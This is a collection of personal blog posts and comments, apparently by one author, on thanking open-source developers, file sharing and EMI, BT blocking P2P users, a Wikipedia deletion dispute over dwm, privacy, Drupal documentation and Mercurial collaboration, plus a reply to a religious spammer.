Just remember that all these people are doing this in their free time, and one of the pillars of motivation is feedback and knowing that what you do is important.

For example I recently (two months ago) sent a mail to the developer of TortoiseHG in which I wrote him, that to me his Program is a revolution for version control systems, because it allows version control even for users who don't know much about their system (and added an example where I managed to use his program to work in a DVCS together with a mostly computer illiterate Windows user - and get going in just 15 minutes).

I could almost feel the happy beaming in his reply where he said even this alone would make it worth all the effort he spent on it.

And I remember my own almost unbelieving joy at having people tell me that the pen-and-paper roleplaying system I write is the best system for their one-shots. It brightens up the whole day and makes me smile much and easily :)

Naturally contributing often feels even better (people who join in, are one of the highest compliments to the project), but when that isn't possible (we all have limited time-budgets), a friendly mail - or better still: A friendly public post which will also lead others to the program - is a great way to help your favorite project!

And if it already gets very much positive feedback, you could look at all the other projects you enjoy and see if one of them could get a bit more feedback. We live through diversity, and every little program adds its share.

Especially for people who get little feedback, such a message helps very much. If nothing else, it helps the developer to see that his work has an important impact. And if the feedback is unexpected, that's even better. People who gets tons of feedback might get used to it, but people who get very little feedback can really flourish - or at least enjoy a happy smile for a few hours and think fondly of what they accomplished and look forward to doing more.

PS: And if the project offers the option, giving a donation helps a lot, too. In a fair world the people behind those projects should be able to do them full-time. We can make the world a little fairer.

Why EMI locks channels: It’s a battle about control

To Why I Steal Movies… Even Ones I'm In by Peter Serafinowicz.

I think there’s a very simple reason why EMI remotely encumbers a channel: It’s a battle about control.

The battle about who will control where, when and how people can enjoy works of art.

That battle goes against the fans (who want to enjoy stuff and pay for it on their own terms) and the artists (who want people to enjoy their stuff and pay for it).

It benefits those who want to pull money out of the revenue stream (which goes from fans to artists) even though the almost free distribution via the internet makes them mostly obsolete.

And online piracy isn’t theft. It’s unauthorized copying which, as Peter Serafinowicz very nicely explains, can even help the artists make more money. The fans get more, the artists get more, only one loses: The one who wants to take freedom from fans and artists alike.

british telekom wants to block accounts just for using Gnutella or BitTorrent

-> a comment to BT to cut off file sharers from TechWatch.

I can read this article in two ways:
1) They took part in sharing/downloading that music file
2) They just had a bittorrent or Gnutella program running.

1 is unlikely, because not every fourth internet user will have downloaded that song.

And if 2 is the case, BT should be sued to its knees.

Having a Gnutella program is not illegal, and blocking access to Gnutella means vastly reduced service.

It's as if they'd take away your flat, because someone saw you using a kitchen knife.

The same is true for BitTorrent which for example gets used by millions of people to download GNU/Linux distributions without creating too much traffic on the servers.

It's what you do with your tool that might be illegal, but having the tool is perfectly legal, and when BT blocks it, they are unduly worsening the service for their customers.

Best wishes,
Arne

deletion attempt against the dwm article on wikipedia (comment)

-> a comment to
Wikipedia, Notability, and Open Source Software by ubunTARD.

2010-03-23
Update: I just got unblocked by henrik who also sent me an excuse for the way the whole process was handled: “…The block was partly an individual misjudgment, but also a result of the systemic culture and some poorly thought out policies. If you're interested, I'd be happy to discuss it in more detail…”. And that restores a lot of my faith in the wikipedia community — thank you very much for your excuse, henrik!
Also they are currently discussing on the incidents board how to avoid similarly overboarding blocking like that in the future.

Just as an inside notice from the discussion: I joined the first deletion discussion when I got note of it (I don't know anymore through which channel) and when it got closed, I joined the second one and got heavily frustrated when people tried to turn “he sent the developers a berliner bratwurst” into “the magazine which published his article is a first source” (which would mean it wouldn't count as source for “notability”).

In that discussion I was mostly alone, and I could only talk there, because I've been a wikipedia user since 2004, and I casually corrected smaller errors in articles whenever I happened to see them while looking something up. I was one of the many small contributors who might not write largescale articles all the time, but who do their share to improve the quality of the articles.

Most others couldn't join up, because the discussion was marked as “semi-closed”, so only longtime users could contribute. And the major contributor to the previous discussion was blocked for meatpuppetry, along with the developer of dwm (additional info) who didn't even cast a vote but only provided sources (reason: “mass ban the meatpuppets” — the dwm developer was unblocked afterwards by others).

After spending hours on refuting their claims, I got frustrated enough that I stopped discussing — and I posted that to identi.ca -> http://identi.ca/arnebab/tag/dwm

Subseqently I got blocked from editing on wikipedia “indefinitely” (except on my talk page) for “canvassing” (since when is ‘they want to delete dwm’ equal to ‘come all here and vote for keeping dwm for the following reasons…’?) and for quoting policy which says that you shouldn't contribute to a deletion discussion if you don't know much about the topic — and that I think that Psychonaut isn't in a position to judge free wm’s.

-> Threat of blocking
-> Blocked and my reply

In my view the policy that you must not speak about the deletion attempt outside wikipedia or risk a ban is even worse than nondisclosure agreements: “You must not speak about this public discussion, or you get banned for meatpuppetry and canvassing.”

I am now pissed off bad enough, that I won't go appealing for an unblock. If the powers-that-be in wikipedia don't see themselves that the block is unjustified, then the power structures in there are such that any contribution I do is on the mercy of moderators who abuse policy for harassing free software since they are not stopped by the ones who don't agree with their doing.

Every public resource run by volunteers faces the danger of falling into the hands of dedicated abusers, and wikipedia is no exception. But it is exceptionally vulnerable, since the ones who contribute content are normally not interested in the necessary day-to-day maintenance, so writers and maintainers are strongly seperated, but the maintainers get most of the power, because they are the ones who get informed of actions which concern articles they are interested in — and because they have the connections inside wikipedia.

But as if that wasn't bad enough, I think there's a third and easily overlooked group: Those who don't write full articles, but do fact checking when they come upon an article on a topic they are knowledgeable about and that way improve the general quality of wikipedia a lot (unstructured peer review). These don't take part in discussions, but mostly use wikipedia as a source, and so they don't want to spend hours on reading some new policy. Instead they generally trust that Wikipedia lives up to it's goal of collecting the sum of human knowledge in encyclopedic articles - and they do their share to help achieve that goal.

They aren't seen as huge contributors, since every one only does some few changes each year, but together they make a huge difference.

I'm mostly a member of the last group (and to some degree article author) — I'm almost sure you expected that :)

And I think that anti-canvassing rules (“don't tell people that the project they feel strongly about is in problems on wikipedia”) and overboarding deletions chase away a major part of these casual editors (don't ask for a citation - this is gut feeling and my own thoughts: “Why should I spend 5 minutes on correcting a few errors in an article on a topic I know much about, when the article could be gone in 5 months time?”).

The article authors might come regardless of the rules and try to add the topic they know much about. But the casual editors will likely be gone for good (and won't ever become authors).

And that would create a major change in the community, cutting wikipedia off from the normal people on the web. And you can imagine how that would affect the value of wikipedia to these people (the vast majority) and its resistance against being misused by some few people to further personal goals.

Besides: Who Writes Wikipedia suggests, that even the main authors are mostly casual contributors, so the effects of alienating casual users would be even worse than I write above: Wikipedia would lose it's source of information.

PS: I didn’t join in the Appeal to delete anyway. Luckily it got refuted. Clearly.

information-disbalance creates a power-disbalance

→ a comment to You call it privacy invasion, I don't from Flameeyes.

What you state is a strong version of the “I’ve got nothing to hide” argument. If you’re interested in a thorough debunking, there is a very good article in the chronicle about that: Why Privacy Matters even if you have nothing to hide.

In short: It’s about an imbalance in knowledge. The danger is less 1984 (that only applies to the weak nothing to hide argument which assumes evildoing from others), but rather Kafkaesque: Other people take decisions about you without telling you how they reach those decisions. Since you do not know their sources (and often do not even know that they took a decision), you cannot correct misinformation about you. And the more those decisions from others affect you, the more you lose control over your life.

The good usecase for information would be that you explicitely request to get advertisements for certain types of wares. Or for wares which are similar to a list of wares you explicitely select. Then you know the data from which the others take decisions about you, and you can change it.

using drupal for documenting software -> blogging with a structure

-> an answer to Blog posts are no replacement for documentation by flameeyes.

Hi flameeyes,

I kinda know your problem: It's far easier to write a number of Blog posts than to write a structured book up front - and I think two major parts of that are, that a weblog provides many more "Yes, I've done it!" moments than a book and that a blog has a much lower barrier to entry.

I rather know it from the other side, though: I wrote a (german) roleplaying ruleset in a wiki, and I got very little feedback and often slacked.

My solution to that was to switch to Drupal which provides a book-style structure with (automatic) blog-style news. I now write articles which can stand for themselves but which are automatically organized by section and keyword.

I also do that for my personal page, but I think the RPG is a much better example (my personal pages are organized by content type/topic (song, poem, story, technical article, ...), while the RPG articles are more connected):

On the righthand side you see the book navigation. the equivalent on my main page about programs would for example be:

A similar structure should be useful for your documentation of programs. You can even first write an uncathegorized blog post and later sort it into its place (and also move it around freely afterwards) - for example when you realize that you write more about the topic.

That way you can start with writing something about a new program, and give that program its own cathegory when you see that you're writing about it more often.

Another advantage of this is, that I began to check every single text, if it's interesting to read (cathegory pages with only a few lines of text can easily be set to not appear on the frontpage - it's simply one checkbox to untick :) - once they grow into articles in their own right, they can then be "republished" to the frontpage with updated publish-date, so they appear as new posts).

writing together – collaborative editing is easy

→ comment to The next wave in scholarly word processors?

What I’d like to see is more people using version tracking systems.

With these you have a discussion which can be merged easily when it gets branched. I use it for anything I do, and I could use it together with an only-windows-and-GUI user with ease, installing TortoiseHG for both and Lyx for him (LaTeX made easy – you don’t have to see the sources).

Just right click in a folder, call synchronize and pull and your work gets merged.

For publishing to the web and to PDF I’d use Emacs org-mode or Markdown with Markdown to LaTeX:

Maybe with markdownify for pages which already are HTML:

Besides: A simple Mercurial repository with URLs as document identifiers would allow forking the web :)

For religious spammers: Shut up and help save our *planet*

-> the_gdf just got spam from a raving christian. Since I am a moderator there, I got that spam and rejected it. But because I was in a good mood, I felt compelled to answer :)

- insert random ravin' lunatic the-world-is-going-to-end talk -

*gg*

Have fun!

Me, instead, I'll rather go with the 6th world of the inkas - they were there earlier than your book.

The alternative is to just believe in science: Ecologists told us 30 years ago

"We're destroying our environment. if we keep doing this, 30 years from now the earth will warm and we'll have weather catastrophies, epidemies (through warmer climate) and much more".

Well, now it's 30 years later and we have weather catastrophies, epidemies and much more.

Also more than 30 years ago left wing economists warned us "if we keep distributing money unevenly and letting big companies run free, our economy will crash again".

Well, it's more than 30 years later, and guess what? They were right. We now have a worldwide economic crisis.

Oh, and more than 14 years ago, people tried to tell the american government "If you keep bulding up terrorists to fight against russia, these will turn around at some point and attack you". Then, 7 years ago people (including me) said "if you attack afghanistan, you will help the terrorists to find new cannon fodder and that way strengthen terrorism".

And now it's 7 years later, and the taliban and "international terroristst" are stronger than ever.

So get up from your book and look at the world. If we don't act, we let people turn our world into our own hell, so don't waste your time but act to save our world!

I don't care what your god says will happen after our dead, but if he really created this world he will be damn pissed at YOU for letting it get destroyed - and I assume that you do care about that.

And here's a little hint: Every creator god is likely to see it the same way, so even if you are wrong and some other religion which believes in a creator god is right, the only way to be on the safe side is to help keep our planet alive.

And if there is no god, then my children will thank me for helping to save their future.

That said: Don't ever spam the_gdf again or my lawyer will be happy to get a chance to sue you. You've been warned.

Which also means: Noone but me read your mail, and noone will, since it isn't going to get through.


I hope you enjoyed my answer :) I got slightly angry at the end, which I take as a warning to ignore these kinds of emails completely from now on.